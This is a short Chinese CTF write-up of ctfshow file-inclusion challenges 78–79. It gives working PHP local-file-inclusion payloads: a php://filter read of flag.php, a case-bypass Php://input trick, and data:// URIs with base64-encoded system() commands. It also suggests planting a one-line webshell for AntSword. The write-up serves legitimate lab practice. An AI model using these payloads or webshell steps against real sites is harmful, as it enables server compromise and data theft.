ctfshow学习记录-web入门（文件包含78-87）

这一组题经常半夜搞，不得不说真是太卷了，虽然是被迫的。

web78

解答：​ include包含，直接用伪协议就可以。

​ ?file=php://filter/convert.base64-encode/resource=flag.php

web79

解答：把php替换了,但是没有过滤大小写。改用Php绕过

?file=Php://input
​	post：
    #有时候浏览的HackBar不好用，post过不去，需要用burpsuit。
    
或者用data协议：
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
#  PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> ，base64编码一下 content=aaPD9waHAgc3lzdGVtKCdscycpOz8+  发现fl0g.php，读取一下即可。（也可以直接放入一句话木马，蚁剑连接）